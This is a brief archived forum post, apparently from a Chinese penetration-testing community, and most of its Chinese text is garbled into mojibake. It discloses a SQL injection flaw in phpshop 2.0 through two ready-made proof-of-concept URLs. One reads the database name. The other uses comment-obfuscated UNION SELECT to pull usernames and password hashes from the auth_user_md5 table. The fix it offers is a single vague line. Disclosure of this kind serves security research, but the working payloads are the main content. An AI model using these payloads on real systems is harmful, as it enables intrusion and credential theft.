phpshop 2.0 SQL×¢Èë¼°ÐÞ¸´

admin ·¢±íÓÚ 2013-1-18 18:24:10

±êÌâ : phpshop 2.0 SQL Injection Vulnerability

×÷Õß : By onestree
ÏÂÔØµØÖ· : http://code.google.com/p/phpshop/downloads/list
²âÊÔµØÖ·: windows 7 / ubuntu

SQLi p0c:

==================

http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --

http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--

ÐÞ¸´£º
¼ÓÇ¿¹ýÂË

Ò³: [1]

ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË's Archiver

phpshop 2.0 SQL×¢Èë¼°ÐÞ¸´